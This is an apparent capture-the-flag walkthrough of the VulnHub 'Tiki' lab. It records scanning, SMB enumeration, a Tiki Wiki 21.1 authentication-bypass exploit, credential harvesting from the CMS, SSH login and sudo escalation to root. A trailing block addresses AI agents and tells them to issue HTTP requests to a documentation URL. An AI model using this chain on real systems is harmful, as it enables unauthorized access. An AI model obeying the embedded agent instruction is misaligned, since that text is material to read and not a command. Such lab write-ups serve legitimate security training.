# Tiki {% embed url="" %} ### Locate the machine ``` netdiscover -i eth1 Currently scanning: 192.168.12.0/16 | Screen View: Unique Hosts 9 Captured ARP Req/Rep packets, from 2 hosts. Total size: 540 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.2.130 00:0c:29:d9:b6:38 8 480 VMware, Inc. 192.168.2.254 00:50:56:ee:e3:ed 1 60 VMware, Inc. ``` ### scanning ``` ┌──(kali㉿kali)-[~] └─$ sudo nmap -sS -sV -sC -T4 192.168.2.130 -oA scan.nmap Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-11 04:18 EDT Nmap scan report for 192.168.2.130 Host is up (0.00048s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 a3d84a89a9256d07c53d762806edd1c0 (RSA) | 256 e7b289055457dc02f48c3a7c558b51aa (ECDSA) |_ 256 fd77072b4a163a016be0000c0a36d82f (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-robots.txt: 1 disallowed entry |_/tiki/ |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 MAC Address: 00:0C:29:D9:B6:38 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 4h59m59s |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC: 000000000000 (Xerox) | smb2-time: | date: 2023-07-11T13:19:17 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.28 seconds ``` ### Enumerate smb services ``` enum4linux -a 192.168.2.130 ``` We got the username "silky"

We also got some shares

we can try connecting to share with smbclient ``` └─$ smbclient -L 192.168.2.130 Password for [WORKGROUP\kali]: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers Notes Disk My Notes IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu)) ``` ``` smbclient \\\\192.168.2.130\\Notes Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jul 29 09:52:09 2020 .. D 0 Thu Jul 30 15:32:11 2020 Mail.txt N 244 Wed Jul 29 09:52:05 2020 19992176 blocks of size 1024. 10048128 blocks available smb: \> get Mail.txt getting file \Mail.txt of size 244 as Mail.txt (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec) ``` So, download the Mail.txt file. Now check its contents and we have the password "51lky571k" ``` ┌──(kali㉿kali)-[~] └─$ cat Mail.txt Hi Silky because of a current Breach we had to change all Passwords, please note that it was a 0day, we don't know how he made it. Your new CMS-password is now 51lky571k1, please investigate how he made it into our Admin Panel. Cheers Boss. ``` ### Enumerate HTTP check robots.txt file

we get tiki cms on main page. visiting tiki CMS robots.txt we do get a few more directories

Running gobuster we get a README file ``` obuster dir --url http://192.168.2.130/tiki/ -w=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.130/tiki/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/07/11 04:37:27 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 317] [--> http://192.168.2.130/tiki/img/] /templates (Status: 301) [Size: 323] [--> http://192.168.2.130/tiki/templates/] /themes (Status: 301) [Size: 320] [--> http://192.168.2.130/tiki/themes/] /modules (Status: 301) [Size: 321] [--> http://192.168.2.130/tiki/modules/] /doc (Status: 301) [Size: 317] [--> http://192.168.2.130/tiki/doc/] /admin (Status: 301) [Size: 319] [--> http://192.168.2.130/tiki/admin/] /lists (Status: 301) [Size: 319] [--> http://192.168.2.130/tiki/lists/] /storage (Status: 301) [Size: 321] [--> http://192.168.2.130/tiki/storage/] /lib (Status: 301) [Size: 317] [--> http://192.168.2.130/tiki/lib/] /db (Status: 301) [Size: 316] [--> http://192.168.2.130/tiki/db/] /README (Status: 200) [Size: 1192] /lang (Status: 301) [Size: 318] [--> http://192.168.2.130/tiki/lang/] /temp (Status: 301) [Size: 318] [--> http://192.168.2.130/tiki/temp/] /vendor (Status: 301) [Size: 320] [--> http://192.168.2.130/tiki/vendor/] /INSTALL (Status: 200) [Size: 3095] /installer (Status: 301) [Size: 323] [--> http://192.168.2.130/tiki/installer/] /dump (Status: 301) [Size: 318] [--> http://192.168.2.130/tiki/dump/] Progress: 144805 / 220561 (65.65%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2023/07/11 04:39:47 Finished =============================================================== ``` same results with FFUF ``` ┌──(kali㉿kali)-[~] └─$ ffuf -u http://192.168.2.130/tiki/FUZZ -w /usr/share/wordlists/dirb/common.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.5.0 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.2.130/tiki/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 113ms] admin [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 9ms] .htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 939ms] db [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 2ms] .htaccess [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 988ms] .hta [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1023ms] doc [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 8ms] dump [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 12ms] img [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 4ms] installer [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 3ms] index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 224ms] lang [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 2ms] lib [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms] lists [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 6ms] modules [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms] README [Status: 200, Size: 1192, Words: 158, Lines: 34, Duration: 1ms] robots.txt [Status: 200, Size: 2937, Words: 335, Lines: 87, Duration: 7ms] storage [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 1ms] temp [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 3ms] templates [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 3ms] themes [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 25ms] vendor [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 18ms] xmlrpc.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 220ms] :: Progress: [4614/4614] :: Job [1/1] :: 2448 req/sec :: Duration: [0:00:05] :: Errors: 0 :: ``` Opening README, we got cms version number tiki 21.1

### Vulnerability search searching vulnerability on searchsploit, we got the hit ``` ─$ searchsploit tiki --------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------- --------------------------------- Tiki Wiki 15.1 - File Upload | php/webapps/40053.py Tiki Wiki 15.1 - File Upload (Metasploit) | php/webapps/40091.rb Tiki Wiki CMS 15.0 - Arbitrary File Download | php/webapps/40080.txt Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution | php/webapps/39965.txt Tiki Wiki CMS Groupware - 'url' Open Redirection | php/webapps/36848.txt Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | php/webapps/48927.py ``` download it ``` searchsploit -m php/webapps/48927.py Exploit: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass URL: https://www.exploit-db.com/exploits/48927 Path: /usr/share/exploitdb/exploits/php/webapps/48927.py Codes: N/A Verified: False File Type: Python script, Unicode text, UTF-8 text executable Copied to: /home/kali/48927.py ``` Now execute the script ``` ┌──(kali㉿kali)-[~] └─$ python3 48927.py 192.168.2.130 Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password ``` Let's use burp and try to log in.

we got logged in.

Visiting the wiki/credentials page, we get the password silky:Agy8Y7SPJNXQzqA

As ssh was enabled, login with ssh ``` ┌──(kali㉿kali)-[~] └─$ ssh silky@192.168.2.130 silky@192.168.2.130's password: Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-42-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 1 Aktualisierung kann sofort installiert werden. 0 dieser Aktualisierung sind Sicherheitsaktualisierungen. Um zu sehen, wie diese zusätzlichen Updates ausgeführt werden: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Your Hardware Enablement Stack (HWE) is supported until April 2025. Last login: Fri Jul 31 09:50:24 2020 from 192.168.56.1 silky@ubuntu:~$ ``` Check permissions and we can run every command so run sudo -i and we have flag in the root directory. ``` silky@ubuntu:~/Note$ sudo -i root@ubuntu:~# ls flag.txt root@ubuntu:~# cat flag.txt ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ █████╗ ████████╗██╗ ██╗██╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗███████╗██╗ ██╔════╝██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝██║ ██║██║ ██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║██╔════╝██║ ██║ ██║ ██║██╔██╗ ██║██║ ███╗██████╔╝███████║ ██║ ██║ ██║██║ ███████║ ██║ ██║██║ ██║██╔██╗ ██║███████╗██║ ██║ ██║ ██║██║╚██╗██║██║ ██║██╔══██╗██╔══██║ ██║ ██║ ██║██║ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║╚════██║╚═╝ ╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║ ██║██║ ██║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║███████║██╗ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚═╝ You did it ^^ I hope you had fun. Share your flag with me on Twitter: S1lky_1337 flag:88d8120f434c3b4221937a8cd0668588 ``` Now we got the flag ``` flag:88d8120f434c3b4221937a8cd0668588 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.cavementech.com/pentesting-quick-reference/boxes-machines/vulnhub/tiki.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.